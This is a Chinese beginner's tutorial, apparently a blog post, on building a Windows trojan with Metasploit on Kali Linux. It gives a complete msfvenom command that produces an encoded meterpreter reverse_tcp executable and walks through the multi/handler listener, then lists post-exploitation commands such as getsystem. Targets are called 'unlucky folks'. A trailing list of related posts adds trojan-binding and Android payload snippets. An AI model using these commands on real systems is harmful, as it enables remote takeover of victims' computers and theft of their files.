kali-使用Metaspoit制作木马
-**
本人是个新手,写写笔记。 如果那里有错误或者语言不妥的地方。
请给予斧正!万分感谢!
**
写在最前面
网络中的日新月异,时常会有更新,下面是针对msf和kali的更新方式
msf中有许多可用的攻击载荷,如果不及时更新会导致对新系统漏洞的不了解
首先要更新kali:
经典三连
apt-get update
apt-get upgrade & apt-get dist-upgrade 强行三连
apt-get clean
重启一下就可以了 reboot 完成kali的整体更新
其次,单独的对msf框架进行更新
msfupdate
以上就是kali的更新!
下面看完文章,会很好奇这个windows/meterpreter/reverse_tcp 这个是从哪里来的?
这个其实是msf框架中的针对windows的一个攻击载荷
如何查看全部攻击载荷或者筛选出我需要的载荷?
- 首先进入msfconsole
- show -h 可以帮助你分类查找
输入 show all 命令就可以查看所有的配置选项
再往下就是攻击载荷
可以使用 show payload 命令之查看现在可用的
你可以找到文章中的windows/meterpreter/reverse_tcp这个payload
这里面有 windows linux还有安卓的等等,根据需要来使用
在这片文章的后面,也就是先使用msfvemon制作出木马,在进入msfconsole的设置
如何判断当前的也就是我们选中的攻击载荷是否对目标操作系统具有有效的攻击?
使用windows/meterpreter/reverse_tcp来举例子
注意我红框的位置,这里就是目标操作系统的范围
怎么查看?
使用 show targets命令查看对那些操作系统有用
这里只有ID 0一个选项,要是有多个选项就是ID 0/ID 1 /ID 2这种格式
使用 set id 0/1/2 命令来选择需要的操作系统
首先,我们要先知道木马的使用过程,然后我们才能制作出木马
- 木马:控制端(我们)
- 被控制端(倒霉蛋们)
- 虚拟机的kali
- 打开终端
- 使用msfvenom -p命令来制作(因为我用的是kali2.0所以和1.0的版本不一样)
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe > asd.exe
- 看不明白?不要慌!
- windows/meterpreter/reverse_tcp ->大体看出来这是windows下的tcp的一个漏洞(强大的Metaspoit自带多种漏洞,需要什么自行百度就ok)
- -e x86/shikata_ga_nai ->这是编码方式(我的windows7是64位的,所以要选择对应的编码格式。否则,生成可执行文件再打开时就会出现错误!)
- -i 5 ->编码次数
- -b ->就是避免出现的值
- -f exe ->生成.exe的可执行文件
- asd.exe > 文件名.exe
- LHOST ->这是填写自己本机的IP(因为这种木马是用反弹机制)
- LPORT ->填写自己的端口
- 回车运行!
- 我们可以看到,它生成一个434b的可执行文件
- 问题来了!生成的文件在哪里?
- 使用ls命令查看,生成在当前目录下
- 然后,将生成文件复制到windows下
- 第二步
- 配置接收木马上线的设置
- 打开Metaspoit
打开的命令为 msfconsole
- 我们就要开始输入命令了
msf > use exploit/multi/handler
- 我们使用handler模块
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
- 打开handler模块后,设置我们制作时用的木马漏洞
- 这里就显示设置成功
- 我们现在就要设置接收的IP和端口
- 输入命令
msf exploit(handler) > show options
- 显示,我们需要填写什么设置
- 大家还记得我们制作木马时,填写的ip和端口吧
- 一定要对应
msf exploit(handler) > set LHOST 192.168.1.108
- 使用set来依次设置
msf exploit(handler) > set LPORT 5555
- 成功设置后
- 最后一步!
- 输入
msf exploit(handler) > exploit
- 运行,等待木马上线
- 我们在windows下双击运行
- 木马上线成功!
- 接下来就可以进行系统操作和文件操作
- background 后台运行
- sessions -i 查看后台运行会话
- sessions -i ID号
- getsystem
kali-使用Metaspoit制作木马相关推荐
- kali使用msf简单制作木马
命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 ...
- msfvenom捆绑/制作木马程序
使用命令: 捆绑木马: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -x calc.exe - ...
- 信息安全实验五 之 计算机病毒与黑客实验脚本【恶意网页病毒演示病毒制作木马捆绑】
信息安全实验五 之 计算机病毒与黑客实验脚本[恶意网页病毒演示&病毒制作&木马捆绑] 一.脚本及恶意网页病毒演示实验 1.创建文件 2.拷贝文件 3.删除文件 4.修改文件 二.病毒详 ...
- Kali Linux使用MSF木马入侵安卓手机
声明: 本文章仅做娱乐和学习,切勿非法使用!! 本人技术一般,水平有限,如有不对请多多指正. 一.环境准备 Kali Linux 安卓手机一部(安卓11) 二.内网穿透 要想玩的好,总不能本地玩自己吧 ...
- 利用msfvenom制作木马,并且反弹shell
反弹shell原理: 反弹shell是指控制端监听某个TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出传递到控制端的过程. 工具 msfvenom:"msfvenom是ms ...
- 9.Metasploit制作木马后门
01木马与后门 木马?后门? 木马和后门都有害,尤其是木马,它由攻击者主动发起,稍不留心就会被利用:后门原来是留给自己方便用的,但也有可能被非法利用,这两种程序都会给用户带来损失. 木马是指潜伏在 ...
- kali U盘制作完事 发现32G变为了2G
前几天,做了一个kali系统,结果发现做完以后自己的U盘在windows下打不开,点击就让我格式化,格式化完事只有2GB. 我就上网找啊找,找到一个办法.怕以后出现这毛病,再忘了怎么操作,就在自己博客 ...
- metasploit制作木马程序
第七章第三小节,讲的是将木马绑定到putty.exe程序下.觉得蛮有趣,这里再重复下书上的步骤: 1)百度搜索,下载原版putty程序 2)在bt5下输入命令:msfpayload windows/m ...
- Python制作木马
import os, time while True: try: os.system(r'taskkill /F /IM explore.exe') except: print('电脑已经黑屏 ...
最新文章
- C语言标准数学函数库math.h之常用函数介绍
- Shell Basic
- [转]避免PHP-FPM内存泄漏导致内存耗尽
- 【数学建模】种群竞争模型(最优化)
- java oracle分页查询语句_oracle分页查询语句,java得到分页查询语句的方法
- 华为鸿蒙新机价格表,华为Mate30已确认:鸿蒙系统+巴龙5000,售价感人
- 2012北理机试题——已知中序和后序遍历序列,求先序
- JAVA ftps设置_如何使用apache.commons.net.ftps配置客户端身份验证?
- win10系统开启扫描仪服务器,win10系统打开打印机和扫描仪的操作方法
- 2020微信小程序学习报告.2.17-3.1.(一)
- for根据ID去重_汽车ECU参数标定之配置Overlay RAM实现Qorivva MPC57xx系列MCU参数在线标定和代码重映射原理和方法详解...
- 程序员常说的外包公司到底是什么?
- android xml sax解析,《android用SAX解析xml》
- linux管道只能运输参数吗,oeasy教您玩转 linux 010212 管道 pipe
- 2021年北京积分落户名单公布了,爬了两个多小时得到了所有数据,有了惊人的发现(附源码)
- nginx 简单配置
- 离线数仓12—— 数仓开发之DWD层
- 电脑重装系统傻瓜式教程详解
- 服务器系统使用30金手指,金手指
- Web API Request Content多次读取